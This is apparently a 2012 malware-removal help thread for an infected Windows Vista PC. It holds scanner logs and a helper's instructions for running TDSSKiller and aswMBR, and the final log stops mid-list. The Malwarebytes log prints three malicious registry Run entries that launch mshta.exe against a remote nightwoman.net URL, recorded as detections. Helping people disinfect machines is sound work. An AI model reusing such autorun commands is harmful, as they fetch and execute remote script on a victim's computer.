S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-7 257696]
S3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-3-20 74112]
S3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2012-3-26 214952]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S3 WSDPrintDevice;WSD Print Support via UMB;c:\windows\system32\drivers\WSDPrint.sys [2008-6-19 16896]
S4 dldt_device;dldt_device;c:\windows\system32\dldtcoms.exe -service --> c:\windows\system32\dldtcoms.exe -service [?]
S4 dldtCATSCustConnectService;dldtCATSCustConnectService;c:\windows\system32\spool\drivers\w32x86\3\dldtserv.exe [2009-7-9 98984]
S4 Giraffic;Veoh Giraffic Video Accelerator;c:\program files\giraffic\veoh_girafficwatchdog.exe --service --> c:\program files\giraffic\Veoh_GirafficWatchdog.exe --service [?]
S4 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 52\starwind\StarWindServiceAE.exe [2007-5-28 275968]
.
=============== Created Last 30 ================
.
2012-05-31 04:16:15	6737808	----a-w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{e94b2023-122d-433a-ae9a-3132e3d1fc8c}\mpengine.dll
2012-05-30 04:28:50	6737808	------w-	c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2012-05-30 04:16:06	--------	d-----w-	c:\users\gagan\appdata\local\temp
2012-05-30 04:05:51	--------	d-----w-	C:\$RECYCLE.BIN
2012-05-30 03:46:31	--------	d-----w-	C:\ComboFix
2012-05-29 02:31:16	98816	----a-w-	c:\windows\sed.exe
2012-05-29 02:31:16	518144	----a-w-	c:\windows\SWREG.exe
2012-05-29 02:31:16	256000	----a-w-	c:\windows\PEV.exe
2012-05-29 02:31:16	208896	----a-w-	c:\windows\MBR.exe
2012-05-22 05:16:47	713784	------w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{f78cef23-eb95-4ded-8458-48e319614326}\gapaengine.dll
2012-05-22 05:09:57	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 08:37:25	6737808	----a-w-	c:\programdata\microsoft\windows defender\definition updates\{3070ec37-30ca-43ae-ac15-bbe0716a8aad}\mpengine.dll
2012-05-19 05:43:51	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57:56	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57:42	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57:41	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57:34	1404928	----a-w-	c:\program files\common files\microsoft shared\ink\InkObj.dll
2012-05-14 22:57:32	936960	----a-w-	c:\program files\common files\microsoft shared\ink\journal.dll
2012-05-14 22:57:20	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57:19	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57:19	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57:18	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:57:18	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:56:51	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56:50	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56:49	2044928	----a-w-	c:\windows\system32\win32k.sys
2012-05-09 04:58:39	592824	----a-w-	c:\program files\mozilla firefox\gkmedias.dll
2012-05-09 04:58:39	44472	----a-w-	c:\program files\mozilla firefox\mozglue.dll
.
==================== Find3M ====================
.
2012-05-05 06:08:36	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-05-05 06:08:36	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-04-04 19:56:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44:12	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44:12	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
.
============= FINISH: 0:42:54.46 ===============


----------



## gagraptor (May 23, 2012)

Malwarebytes Anti-Malware 1.61.0.1400
www.malwarebytes.org

Database version: v2012.05.28.01

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19222
GAGAN :: GAGAN-PC [administrator]

5/31/2012 12:07:13 AM
mbam-log-2012-05-31 (00-33-35).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 206101
Time elapsed: 13 minute(s), 40 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 3
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://nightwoman.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 -> No action taken.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://nightwoman.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> No action taken.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://nightwoman.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> No action taken.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)


----------



## gagraptor (May 23, 2012)

malware bytes does not seem to be able to remove these trojans. it informs its removed but shows up in the next scan i run.
would running it in safe mode help???


----------



## Mark1956 (May 7, 2011)

You can see that the internet site the reg keys are pointing to has changed. Malwarebytes is removing them but they are being recreated by an infection. We need to scan with other tools.

Please follow the instructions exactly as written, deviating from the instructions and trying to fix anything before I have seen the logs may make your PC unbootable. If TDSSKiller does not offer the Cure option *DO NOT select delete* as you may remove files needed for the system to operate.

Please follow this:

*STEP 1*
Please download Kaspersky's *TDSSKiller* and *save it to your Desktop. <-Important!*
_-- The tool is frequently updated...if you used TDSSKiller before, delete that version and download the most current one before using again._

_Be sure to print out and follow the instructions for performing a scan_.

Extract (unzip) the file to your desktop and make sure TDSSKiller.exe (the contents of the zipped file) is on the Desktop itself, not within a folder on the Desktop.
Alternatively, you can download TDSSKiller.exe and use that instead.
Double-click on *TDSSKiller.exe* to run the tool for known TDSS variants.
_*Vista*/*Windows 7* users right-click and select Run As Administrator_.
If an update is available, TDSSKiller will prompt you to update and download the most current version. Click *Load Update*. Close TDSSKiller and start again.

When the program opens, click the *Change parameters.*









Under "Additional options", check the boxes next to *Verify file digital signatures* and *Detect TDLFS file system*, then click *OK*.









Click the *Start Scan* button.









Do not use the computer during the scan
If the scan completes with nothing found, click *Close* to exit.
If '*Suspicious objects*' are detected, the default action will be *Skip*. Leave the default set to Skip and click on *Continue*.
If *Malicious objects* are detected, they will show in the Scan results - Select action for found objects and offer three options.









Ensure *Cure* is selected...then click *Continue* -> *Reboot computer* *for cure completion.*









*Important! ->* If *Cure* *is not available*, please choose *Skip* instead. *Do not choose Delete unless instructed.* If you choose *Delete* you may *remove critical system files* and make your PC *unstable* or possibly *unbootable*.
A log file named *TDSSKiller_version_date_time_log.txt* will be created and saved to the root directory (usually Local Disk C.
Copy and paste the contents of that file in your next reply.
_-- If TDSSKiller does not run, try renaming it. To do this, right-click on *TDSSKiller.exe*, select *Rename* and give it a random name with the *.com* file extension (i.e. 123abc.com). If you do not see the file extension, please refer to these instructions. In some cases it may be necessary to redownload TDSSKiller and randomly rename it to something else *before* beginning the download and saving to the computer or to perform the scan in "safe mode"._

*STEP 2*

Please download *aswMBR.exe* and save it to your Desktop.

Double click on aswMBR.exe to run it. _*Vista*/*Windows 7* users right-click and select Run As Administrator_.
Click the *Scan* button to start scan.








On completion of the scan, click the *Save log* button and save it to your Desktop.








*Do not* select any Fix options at this time.
Copy and paste the contents of that log in your next reply.
*-- Important note*: Upon the first run, aswMBR will back up the MBR and save it to the Desktop as *MBR.dat*. Do not delete this file unless advised.


----------



## gagraptor (May 23, 2012)

aswMBR version 0.9.9.1665 Copyright(c) 2011 AVAST Software
Run date: 2012-06-01 00:59:48
-----------------------------
00:59:48.567 OS Version: Windows 6.0.6002 Service Pack 2
00:59:48.567 Number of processors: 2 586 0x6801
00:59:48.570 ComputerName: GAGAN-PC UserName: GAGAN
00:59:49.640 Initialize success
01:01:13.692 AVAST engine defs: 12053101
01:01:51.643 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0
01:01:51.645 Disk 0 Vendor: FUJITSU_MHX2250BT 0040000C Size: 238475MB BusType: 3
01:01:51.681 Disk 0 MBR read successfully
01:01:51.684 Disk 0 MBR scan
01:01:51.691 Disk 0 Windows VISTA default MBR code
01:01:51.706 Disk 0 Partition 1 00 27 Hidden NTFS WinRE NTFS 1500 MB offset 2048
01:01:51.739 Disk 0 Partition 2 80 (A) 07 HPFS/NTFS NTFS 236974 MB offset 3074048
01:01:51.761 Disk 0 scanning sectors +488396800
01:01:51.890 Disk 0 scanning C:\Windows\system32\drivers
01:02:19.054 Service scanning
01:02:46.805 Service MpKsl969ad15c c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{50C28A22-B3EC-472C-BB7F-F841BF47E300}\MpKsl969ad15c.sys **LOCKED** 32
01:03:04.441 Service sptd C:\Windows\System32\Drivers\sptd.sys **LOCKED** 32
01:03:25.312 Modules scanning
01:03:49.726 Disk 0 trace - called modules:
01:03:49.756 ntkrnlpa.exe CLASSPNP.SYS disk.sys acpi.sys hal.dll >>UNKNOWN [0x855401f8]<<
01:03:49.762 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x85ddc8e0]
01:03:49.767 3 CLASSPNP.SYS[881138b3] -> nt!IofCallDriver -> [0x85621310]
01:03:49.773 5 acpi.sys[82b3b6bc] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-0[0x8559bb98]
01:03:49.779 \Driver\atapi[0x8562ed40] -> IRP_MJ_CREATE -> 0x855401f8
01:03:50.757 AVAST engine scan C:\Windows
01:03:59.486 AVAST engine scan C:\Windows\system32
01:12:07.695 AVAST engine scan C:\Windows\system32\drivers
01:12:39.190 AVAST engine scan C:\Users\GAGAN
01:14:56.205 Disk 0 MBR has been saved successfully to "C:\Users\GAGAN\Desktop\MBR.dat"
01:14:56.262 The log file has been saved successfully to "C:\Users\GAGAN\Desktop\aswMBR.txt"

not sure if this is right, but is the only log file i found


----------



## gagraptor (May 23, 2012)

00:52:26.0398 4512	TDSS rootkit removing tool 2.7.36.0 May 21 2012 16:40:16
00:52:26.0651 4512	============================================================
00:52:26.0651 4512	Current date / time: 2012/06/01 00:52:26.0651
00:52:26.0651 4512	SystemInfo:
00:52:26.0651 4512	
00:52:26.0651 4512	OS Version: 6.0.6002 ServicePack: 2.0
00:52:26.0651 4512	Product type: Workstation
00:52:26.0651 4512	ComputerName: GAGAN-PC
00:52:26.0652 4512	UserName: GAGAN
00:52:26.0652 4512	Windows directory: C:\Windows
00:52:26.0652 4512	System windows directory: C:\Windows
00:52:26.0652 4512	Processor architecture: Intel x86
00:52:26.0652 4512	Number of processors: 2
00:52:26.0652 4512	Page size: 0x1000
00:52:26.0652 4512	Boot type: Normal boot
00:52:26.0652 4512	============================================================
00:52:29.0672 4512	Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
00:52:29.0675 4512	============================================================
00:52:29.0675 4512	\Device\Harddisk0\DR0:
00:52:29.0675 4512	MBR partitions:
00:52:29.0675 4512	\Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x2EE800, BlocksNum 0x1CED7000
00:52:29.0675 4512	============================================================
00:52:29.0782 4512	C: <-> \Device\Harddisk0\DR0\Partition0
00:52:29.0782 4512	============================================================
00:52:29.0782 4512	Initialize success
00:52:29.0782 4512	============================================================
00:53:02.0269 4376	============================================================
00:53:02.0269 4376	Scan started
00:53:02.0269 4376	Mode: Manual; SigCheck; TDLFS; 
00:53:02.0269 4376	============================================================
00:53:03.0704 4376	ACPI (82b296ae1892fe3dbee00c9cf92f8ac7) C:\Windows\system32\drivers\acpi.sys
00:53:03.0845 4376	ACPI - ok
00:53:04.0016 4376	AdobeFlashPlayerUpdateSvc (76d5a3d2a50402a0b9b6ed13c4371e79) C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
00:53:04.0032 4376	AdobeFlashPlayerUpdateSvc - ok
00:53:04.0141 4376	adp94xx (2edc5bbac6c651ece337bde8ed97c9fb) C:\Windows\system32\drivers\adp94xx.sys
00:53:04.0203 4376	adp94xx - ok
00:53:04.0313 4376	adpahci (b84088ca3cdca97da44a984c6ce1ccad) C:\Windows\system32\drivers\adpahci.sys
00:53:04.0328 4376	adpahci - ok
00:53:04.0469 4376	adpu160m (7880c67bccc27c86fd05aa2afb5ea469) C:\Windows\system32\drivers\adpu160m.sys
00:53:04.0484 4376	adpu160m - ok
00:53:04.0515 4376	adpu320 (9ae713f8e30efc2abccd84904333df4d) C:\Windows\system32\drivers\adpu320.sys
00:53:04.0531 4376	adpu320 - ok
00:53:04.0593 4376	AeLookupSvc (9d1fda9e086ba64e3c93c9de32461bcf) C:\Windows\System32\aelupsvc.dll
00:53:04.0703 4376	AeLookupSvc - ok
00:53:04.0859 4376	AFD (3911b972b55fea0478476b2e777b29fa) C:\Windows\system32\drivers\afd.sys
00:53:04.0905 4376	AFD - ok
00:53:04.0952 4376	AgereModemAudio (39e435c90c9c4f780fa0ed05ca3c3a1b) C:\Windows\system32\agrsmsvc.exe
00:53:04.0983 4376	AgereModemAudio - ok
00:53:05.0280 4376	AgereSoftModem (ce91b158fa490cf4c4d487a4130f4660) C:\Windows\system32\DRIVERS\AGRSM.sys
00:53:05.0358 4376	AgereSoftModem - ok
00:53:05.0483 4376	agp440 (ef23439cdd587f64c2c1b8825cead7d8) C:\Windows\system32\drivers\agp440.sys
00:53:05.0498 4376	agp440 - ok
00:53:05.0514 4376	aic78xx (ae1fdf7bf7bb6c6a70f67699d880592a) C:\Windows\system32\drivers\djsvs.sys
00:53:05.0529 4376	aic78xx - ok
00:53:05.0717 4376	ALG (a1545b731579895d8cc44fc0481c1192) C:\Windows\System32\alg.exe
00:53:05.0857 4376	ALG - ok
00:53:05.0888 4376	aliide (90395b64600ebb4552e26e178c94b2e4) C:\Windows\system32\drivers\aliide.sys
00:53:05.0904 4376	aliide - ok
00:53:05.0935 4376	amdagp (2b13e304c9dfdfa5eb582f6a149fa2c7) C:\Windows\system32\drivers\amdagp.sys
00:53:05.0951 4376	amdagp - ok
00:53:05.0982 4376	amdide (0577df1d323fe75a739c787893d300ea) C:\Windows\system32\drivers\amdide.sys
00:53:05.0997 4376	amdide - ok
00:53:06.0044 4376	AmdK7 (dc487885bcef9f28eece6fac0e5ddfc5) C:\Windows\system32\drivers\amdk7.sys
00:53:06.0278 4376	AmdK7 - ok
00:53:06.0497 4376	AmdK8 (93ae7f7dd54ab986a6f1a1b37be7442d) C:\Windows\system32\DRIVERS\amdk8.sys
00:53:06.0528 4376	AmdK8 - ok
00:53:06.0590 4376	ApfiltrService (7c2f57bce81fa74933f0e1c84a97c9db) C:\Windows\system32\DRIVERS\Apfiltr.sys
00:53:06.0621 4376	ApfiltrService - ok
00:53:07.0058 4376	AppHostSvc (dfae18c675d71fd06d57dc69d2913975) C:\Windows\system32\inetsrv\apphostsvc.dll
00:53:07.0121 4376	AppHostSvc - ok
00:53:07.0214 4376	Appinfo (c6d704c7f0434dc791aac37cac4b6e14) C:\Windows\System32\appinfo.dll
00:53:07.0230 4376	Appinfo - ok
00:53:07.0433 4376	Apple Mobile Device (7ef47644b74ebe721cc32211d3c35e76) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
00:53:07.0464 4376	Apple Mobile Device - ok
00:53:07.0698 4376	arc (5f673180268bb1fdb69c99b6619fe379) C:\Windows\system32\drivers\arc.sys
00:53:07.0713 4376	arc - ok
00:53:07.0760 4376	arcsas (957f7540b5e7f602e44648c7de5a1c05) C:\Windows\system32\drivers\arcsas.sys
00:53:07.0776 4376	arcsas - ok
00:53:07.0854 4376	AsyncMac (53b202abee6455406254444303e87be1) C:\Windows\system32\DRIVERS\asyncmac.sys
00:53:07.0885 4376	AsyncMac - ok
00:53:07.0947 4376	atapi (1f05b78ab91c9075565a9d8a4b880bc4) C:\Windows\system32\drivers\atapi.sys
00:53:07.0963 4376	atapi - ok
00:53:08.0150 4376	athr (8be56f8300e1c37b578da23c71816b7a) C:\Windows\system32\DRIVERS\athr.sys
00:53:08.0275 4376	athr - ok
00:53:08.0431 4376	Ati External Event Utility (59991b5ec50e106634a16444594c305e) C:\Windows\system32\Ati2evxx.exe
00:53:08.0493 4376	Ati External Event Utility - ok
00:53:09.0180 4376	atikmdag (fab37c8e4b55235de9055026561dcc7f) C:\Windows\system32\DRIVERS\atikmdag.sys
00:53:09.0258 4376	atikmdag - ok
00:53:09.0695 4376	AudioEndpointBuilder (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
00:53:09.0726 4376	AudioEndpointBuilder - ok
00:53:09.0741 4376	Audiosrv (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
00:53:09.0773 4376	Audiosrv - ok
00:53:09.0819 4376	axsaki - ok
00:53:09.0882 4376	Beep (67e506b75bd5326a3ec7b70bd014dfb6) C:\Windows\system32\drivers\Beep.sys
00:53:09.0913 4376	Beep - ok
00:53:10.0085 4376	BFE (c789af0f724fda5852fb9a7d3a432381) C:\Windows\System32\bfe.dll
00:53:10.0116 4376	BFE - ok
00:53:10.0412 4376	BITS (93952506c6d67330367f7e7934b6a02f) C:\Windows\system32\qmgr.dll
00:53:10.0490 4376	BITS - ok
00:53:10.0506 4376	blbdrive - ok
00:53:10.0880 4376	Bonjour Service (db5bea73edaf19ac68b2c0fad0f92b1a) C:\Program Files\Bonjour\mDNSResponder.exe
00:53:10.0896 4376	Bonjour Service - ok
00:53:11.0005 4376	bowser (35f376253f687bde63976ccb3f2108ca) C:\Windows\system32\DRIVERS\bowser.sys
00:53:11.0036 4376	bowser - ok
00:53:11.0083 4376	BrFiltLo (9f9acc7f7ccde8a15c282d3f88b43309) C:\Windows\system32\drivers\brfiltlo.sys
00:53:11.0114 4376	BrFiltLo - ok
00:53:11.0177 4376	BrFiltUp (56801ad62213a41f6497f96dee83755a) C:\Windows\system32\drivers\brfiltup.sys
00:53:11.0208 4376	BrFiltUp - ok
00:53:11.0379 4376	Browser (a3629a0c4226f9e9c72faaeebc3ad33c) C:\Windows\System32\browser.dll
00:53:11.0411 4376	Browser - ok
00:53:11.0442 4376	Brserid (b304e75cff293029eddf094246747113) C:\Windows\system32\drivers\brserid.sys
00:53:11.0504 4376	Brserid - ok
00:53:11.0535 4376	BrSerWdm (203f0b1e73adadbbb7b7b1fabd901f6b) C:\Windows\system32\drivers\brserwdm.sys
00:53:11.0598 4376	BrSerWdm - ok
00:53:11.0707 4376	BrUsbMdm (bd456606156ba17e60a04e18016ae54b) C:\Windows\system32\drivers\brusbmdm.sys
00:53:11.0754 4376	BrUsbMdm - ok
00:53:11.0785 4376	BrUsbSer (af72ed54503f717a43268b3cc5faec2e) C:\Windows\system32\drivers\brusbser.sys
00:53:11.0863 4376	BrUsbSer - ok
00:53:12.0144 4376	BTHMODEM (ad07c1ec6665b8b35741ab91200c6b68) C:\Windows\system32\drivers\bthmodem.sys
00:53:12.0222 4376	BTHMODEM - ok
00:53:12.0347 4376	BVRPMPR5 (248dfa5762dde38dfddbbd44149e9d7a) C:\Windows\system32\drivers\BVRPMPR5.SYS
00:53:12.0362 4376	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - warning
00:53:12.0362 4376	BVRPMPR5 - detected UnsignedFile.Multi.Generic (1)
00:53:12.0409 4376	catchme - ok
00:53:12.0534 4376	cdfs (7add03e75beb9e6dd102c3081d29840a) C:\Windows\system32\DRIVERS\cdfs.sys
00:53:12.0565 4376	cdfs - ok
00:53:12.0674 4376	cdrom (6b4bffb9becd728097024276430db314) C:\Windows\system32\DRIVERS\cdrom.sys
00:53:12.0721 4376	cdrom - ok
00:53:12.0861 4376	CertPropSvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
00:53:12.0877 4376	CertPropSvc - ok
00:53:13.0002 4376	circlass (da8e0afc7baa226c538ef53ac2f90897) C:\Windows\system32\drivers\circlass.sys
00:53:13.0064 4376	circlass - ok
00:53:13.0173 4376	CLFS (d7659d3b5b92c31e84e53c1431f35132) C:\Windows\system32\CLFS.sys
00:53:13.0205 4376	CLFS - ok
00:53:13.0485 4376	clr_optimization_v2.0.50727_32 (8ee772032e2fe80a924f3b8dd5082194) C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
00:53:13.0501 4376	clr_optimization_v2.0.50727_32 - ok
00:53:13.0673 4376	clr_optimization_v4.0.30319_32 (c5a75eb48e2344abdc162bda79e16841) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
00:53:13.0688 4376	clr_optimization_v4.0.30319_32 - ok
00:53:13.0782 4376	CmBatt (99afc3795b58cc478fbbbcdc658fcb56) C:\Windows\system32\DRIVERS\CmBatt.sys
00:53:13.0813 4376	CmBatt - ok
00:53:13.0891 4376	cmdide (45201046c776ffdaf3fc8a0029c581c8) C:\Windows\system32\drivers\cmdide.sys
00:53:13.0907 4376	cmdide - ok
00:53:14.0109 4376	Compbatt (6afef0b60fa25de07c0968983ee4f60a) C:\Windows\system32\DRIVERS\compbatt.sys
00:53:14.0172 4376	Compbatt - ok
00:53:14.0172 4376	COMSysApp - ok
00:53:14.0375 4376	crcdisk (2a213ae086bbec5e937553c7d9a2b22c) C:\Windows\system32\drivers\crcdisk.sys
00:53:14.0375 4376	crcdisk - ok
00:53:14.0702 4376	Crusoe (22a7f883508176489f559ee745b5bf5d) C:\Windows\system32\drivers\crusoe.sys
00:53:14.0749 4376	Crusoe - ok
00:53:14.0827 4376	CryptSvc (fb27772beaf8e1d28ccd825c09da939b) C:\Windows\system32\cryptsvc.dll
00:53:14.0858 4376	CryptSvc - ok
00:53:15.0045 4376	DcomLaunch (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
00:53:15.0201 4376	DcomLaunch - ok
00:53:15.0435 4376	DfsC (622c41a07ca7e6dd91770f50d532cb6c) C:\Windows\system32\Drivers\dfsc.sys
00:53:15.0482 4376	DfsC - ok
00:53:16.0356 4376	DFSR (2cc3dcfb533a1035b13dcab6160ab38b) C:\Windows\system32\DFSR.exe
00:53:16.0512 4376	DFSR - ok
00:53:16.0824 4376	Dhcp (9028559c132146fb75eb7acf384b086a) C:\Windows\System32\dhcpcsvc.dll
00:53:16.0855 4376	Dhcp - ok
00:53:16.0964 4376	disk (5d4aefc3386920236a548271f8f1af6a) C:\Windows\system32\drivers\disk.sys
00:53:16.0980 4376	disk - ok
00:53:17.0276 4376	dldtCATSCustConnectService (31b7596edd9505fcbb07670fb69cbb48) C:\Windows\system32\spool\DRIVERS\W32X86\3\\dldtserv.exe
00:53:17.0292 4376	dldtCATSCustConnectService - ok
00:53:17.0307 4376	dldt_device - ok
00:53:17.0619 4376	Dnscache (57d762f6f5974af0da2be88a3349baaa) C:\Windows\System32\dnsrslvr.dll
00:53:17.0651 4376	Dnscache - ok
00:53:17.0775 4376	dot3svc (324fd74686b1ef5e7c19a8af49e748f6) C:\Windows\System32\dot3svc.dll
00:53:17.0807 4376	dot3svc - ok
00:53:17.0885 4376	DPS (a622e888f8aa2f6b49e9bc466f0e5def) C:\Windows\system32\dps.dll
00:53:17.0916 4376	DPS - ok
00:53:18.0025 4376	drmkaud (97fef831ab90bee128c9af390e243f80) C:\Windows\system32\drivers\drmkaud.sys
00:53:18.0056 4376	drmkaud - ok
00:53:18.0181 4376	DXGKrnl (c68ac676b0ef30cfbb1080adce49eb1f) C:\Windows\System32\drivers\dxgkrnl.sys
00:53:18.0243 4376	DXGKrnl - ok
00:53:18.0306 4376	E1G60 (f88fb26547fd2ce6d0a5af2985892c48) C:\Windows\system32\DRIVERS\E1G60I32.sys
00:53:18.0353 4376	E1G60 - ok
00:53:18.0493 4376	EapHost (c0b95e40d85cd807d614e264248a45b9) C:\Windows\System32\eapsvc.dll
00:53:18.0524 4376	EapHost - ok
00:53:18.0805 4376	Ecache (7f64ea048dcfac7acf8b4d7b4e6fe371) C:\Windows\system32\drivers\ecache.sys
00:53:18.0821 4376	Ecache - ok
00:53:19.0008 4376	ehRecvr (9be3744d295a7701eb425332014f0797) C:\Windows\ehome\ehRecvr.exe
00:53:19.0164 4376	ehRecvr - ok
00:53:19.0460 4376	ehSched (ad1870c8e5d6dd340c829e6074bf3c3f) C:\Windows\ehome\ehsched.exe
00:53:19.0554 4376	ehSched - ok
00:53:19.0585 4376	ehstart (c27c4ee8926e74aa72efcab24c5242c3) C:\Windows\ehome\ehstart.dll
00:53:19.0616 4376	ehstart - ok
00:53:19.0679 4376	ElbyCDIO (aaa8999a169e39fb8b48ae49cd6ac30a) C:\Windows\system32\Drivers\ElbyCDIO.sys
00:53:19.0710 4376	ElbyCDIO - ok
00:53:19.0788 4376	ElbyDelay (e205c313417da6fa7afe85912a310a65) C:\Windows\system32\Drivers\ElbyDelay.sys
00:53:19.0788 4376	ElbyDelay - ok
00:53:19.0881 4376	elxstor (e8f3f21a71720c84bcf423b80028359f) C:\Windows\system32\drivers\elxstor.sys
00:53:19.0913 4376	elxstor - ok
00:53:20.0069 4376	EMDMgmt (4e6b23dfc917ea39306b529b773950f4) C:\Windows\system32\emdmgmt.dll
00:53:20.0147 4376	EMDMgmt - ok
00:53:20.0256 4376	EventSystem (67058c46504bc12d821f38cf99b7b28f) C:\Windows\system32\es.dll
00:53:20.0287 4376	EventSystem - ok
00:53:20.0412 4376	exfat (22b408651f9123527bcee54b4f6c5cae) C:\Windows\system32\drivers\exfat.sys
00:53:20.0459 4376	exfat - ok
00:53:20.0568 4376	fastfat (1e9b9a70d332103c52995e957dc09ef8) C:\Windows\system32\drivers\fastfat.sys
00:53:20.0599 4376	fastfat - ok
00:53:20.0646 4376	fdc (63bdada84951b9c03e641800e176898a) C:\Windows\system32\DRIVERS\fdc.sys
00:53:20.0708 4376	fdc - ok
00:53:20.0739 4376	fdPHost (6629b5f0e98151f4afdd87567ea32ba3) C:\Windows\system32\fdPHost.dll
00:53:20.0771 4376	fdPHost - ok
00:53:20.0880 4376	FDResPub (89ed56dce8e47af40892778a5bd31fd2) C:\Windows\system32\fdrespub.dll
00:53:20.0927 4376	FDResPub - ok
00:53:21.0067 4376	FileInfo (a8c0139a884861e3aae9cfe73b208a9f) C:\Windows\system32\drivers\fileinfo.sys
00:53:21.0083 4376	FileInfo - ok
00:53:21.0114 4376	Filetrace (0ae429a696aecbc5970e3cf2c62635ae) C:\Windows\system32\drivers\filetrace.sys
00:53:21.0145 4376	Filetrace - ok
00:53:21.0207 4376	flpydisk (6603957eff5ec62d25075ea8ac27de68) C:\Windows\system32\DRIVERS\flpydisk.sys
00:53:21.0270 4376	flpydisk - ok
00:53:21.0379 4376	FltMgr (01334f9ea68e6877c4ef05d3ea8abb05) C:\Windows\system32\drivers\fltmgr.sys
00:53:21.0395 4376	FltMgr - ok
00:53:21.0675 4376	FontCache (8ce364388c8eca59b14b539179276d44) C:\Windows\system32\FntCache.dll
00:53:21.0753 4376	FontCache - ok
00:53:22.0019 4376	FontCache3.0.0.0 (c7fbdd1ed42f82bfa35167a5c9803ea3) C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
00:53:22.0034 4376	FontCache3.0.0.0 - ok
00:53:22.0143 4376	Fs_Rec (b972a66758577e0bfd1de0f91aaa27b5) C:\Windows\system32\drivers\Fs_Rec.sys
00:53:22.0175 4376	Fs_Rec - ok
00:53:22.0206 4376	gagp30kx (4e1cd0a45c50a8882616cae5bf82f3c5) C:\Windows\system32\drivers\gagp30kx.sys
00:53:22.0221 4376	gagp30kx - ok
00:53:22.0362 4376	GEARAspiWDM (8182ff89c65e4d38b2de4bb0fb18564e) C:\Windows\system32\Drivers\GEARAspiWDM.sys
00:53:22.0362 4376	GEARAspiWDM - ok
00:53:22.0549 4376	Giraffic - ok
00:53:22.0783 4376	gpsvc (cd5d0aeee35dfd4e986a5aa1500a6e66) C:\Windows\System32\gpsvc.dll
00:53:22.0845 4376	gpsvc - ok
00:53:22.0923 4376	gusvc (751c1d2ca2abf4a9f5a6b8d7d45b907c) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
00:53:22.0939 4376	gusvc - ok
00:53:23.0079 4376	HdAudAddService (cb04c744be0a61b1d648faed182c3b59) C:\Windows\system32\drivers\HdAudio.sys
